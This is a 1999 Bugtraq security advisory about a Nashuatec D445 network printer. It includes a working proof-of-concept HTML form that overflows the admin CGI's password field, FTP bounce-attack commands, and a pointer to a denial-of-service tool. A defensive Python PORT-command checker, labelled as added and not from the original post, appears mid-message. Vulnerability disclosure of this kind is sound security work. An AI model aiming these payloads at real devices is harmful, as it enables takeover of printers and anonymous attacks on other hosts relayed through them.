[12248] in bugtraq
NEUROCOM: Nashuatec printer, 3 vulnerabilities found
daemon@ATHENA.MIT.EDU (gregory duchemin)
Thu Oct 14 18:44:52 1999
Message-Id: <19991014154501.8406.qmail@securityfocus.com>
Date: Thu, 14 Oct 1999 15:45:01 -0000
Reply-To: gregory duchemin <veille@NEUROCOM.COM>
From: gregory duchemin <veille@NEUROCOM.COM>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
hi,
The NASHUATEC D445 printer is vulnerable to several attacks.
There are four common services running in a standard
configuration: httpd, ftpd, telnetd, printer.
(tested with nmap)
Yesterday I discovered at least three different ways to
attack this kind of box.
First, it is possible to configure the server remotely via its
own admin web server (port 80).
Naturally the server will ask you for an admin password before
submitting the form to the cgi. The password field is 15
chars long, but an intruder with a slightly modified copy of
the original form will be able to submit many more chars
(about 260 will be enough for the test) to the cgi and
produce a buffer overflow (see the example below).
The cgi concerned is "reset", but I suppose every cgi is
exposed to this problem.
If our intruder decides to forge a special password with
instruction code inside, he will force the remote printer to
execute code with the privileges of the target web server.
I don't have, right now, all the information required to gain
server privileges, but you may find it here very soon :)
Attacker form example:
<HTML>
<HEAD>
<TITLE>Nashuadeath</TITLE>
</HEAD>
<!-- Gregory Duchemin Aka c3rber -->
<!-- NEUROCOM -->
<!-- http://www.neurocom.com -->
<!-- 179/181 Avenue Charles de Gaulle -->
<!-- 92200 Neuilly Sur Seine -->
<!-- Tel: 01.41.43.84.84 Fax: 01.41.43.84.80 -->
<BODY>
<HR>
<CENTER><FONT SIZE=+2><big><B>NIB
450-E</B></big></FONT></CENTER>
<HR>
<CENTER><FONT SIZE=+2>Unit Serial Number
599132</FONT></CENTER>
<HR>
<H2><CENTER>Reset Unit</CENTER></H2>
<HR>
<FORM ENCTYPE="x-www-form-encoded" METHOD="POST"
ACTION="http://victim-printer-ip/Forms/reset">
<B>A very big password is required to perform this function
( at least 260 chars length ).</B><BR>
<BR>
<INPUT TYPE="text" NAME="http_pwd" SIZE="100"
MAXLENGTH="1500">
<BR>
<BR>
<INPUT TYPE="SUBMIT" NAME="Submit" VALUE="T3st M3 PL3ase">
</FORM>
<P>
<HR>
<P>
<CENTER>[ <A HREF="/index">Home</A> | <A HREF="/info">Unit
Info</A> ]
</CENTER>
</BODY>
</HTML>
Another flaw is present in the ftp daemon, which permits the
infamous "bounce attack".
ftp printer.victim.com
user xxxxx
pass xxxxx
quote port a1,a2,a3,a4,0,25
a1.a2.a3.a4 is any other ip address.
The ftp server checks neither the type of port in the
request (< 1024 = administrative port) nor the ip address
used.
So an intruder may use the service to attack other
boxes anonymously.
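As an added example (not code from the original post or from the printer's firmware), here are the two checks a defender would expect an ftp daemon to make before honouring a PORT command: the data address must match the control connection's peer, and the port must not be a privileged one. The regex, function names and sample addresses are my assumptions.

```python
import ipaddress
import re

# Highest privileged port; the post's example "quote port a1,a2,a3,a4,0,25"
# asks the server to open a data connection to port 0*256+25 = 25 (smtp).
PRIVILEGED_PORT_MAX = 1023

# RFC 959 PORT syntax: six comma-separated decimal bytes (h1,h2,h3,h4,p1,p2).
_PORT_RE = re.compile(r"^PORT\s+(\d{1,3}(?:,\d{1,3}){5})\s*$", re.IGNORECASE)


def parse_port_command(line: str):
    """Parse a PORT command into (ip, port); return None if malformed."""
    m = _PORT_RE.match(line.strip())
    if not m:
        return None
    fields = [int(x) for x in m.group(1).split(",")]
    if any(f > 255 for f in fields):
        return None  # octet out of range
    h1, h2, h3, h4, p1, p2 = fields
    return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2


def check_port_command(line: str, control_peer_ip: str):
    """Return (accepted, reason) for a PORT command received from control_peer_ip.

    Both checks are the ones the post says the printer's ftpd omits.
    """
    parsed = parse_port_command(line)
    if parsed is None:
        return False, "malformed PORT command"
    ip, port = parsed
    # Refuse to open the data connection to a host other than the client.
    if ipaddress.ip_address(ip) != ipaddress.ip_address(control_peer_ip):
        return False, f"data address {ip} differs from control peer {control_peer_ip}"
    # Refuse privileged ports (and port 0), which bounce attacks rely on.
    if port <= PRIVILEGED_PORT_MAX:
        return False, f"refusing privileged port {port}"
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample: client 192.0.2.7 tries to bounce to 10.0.0.5:25.
    print(check_port_command("PORT 10,0,0,5,0,25", "192.0.2.7"))
    print(check_port_command("PORT 192,0,2,7,4,1", "192.0.2.7"))
```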
The last one is a denial of service with an icmp redirect
storm against the printer's ip stack.
Use winfreez.c to test it.
The printer will not respond anymore during the attack.
Have a nice day,
Gregory Duchemin.
-------------------------
NEUROCOM
http://www.neurocom.com
179/181 Avenue Charles de Gaulle
92200 Neuilly Sur Seine
Tel: 01.41.43.84.84 Fax: 01.41.43.84.80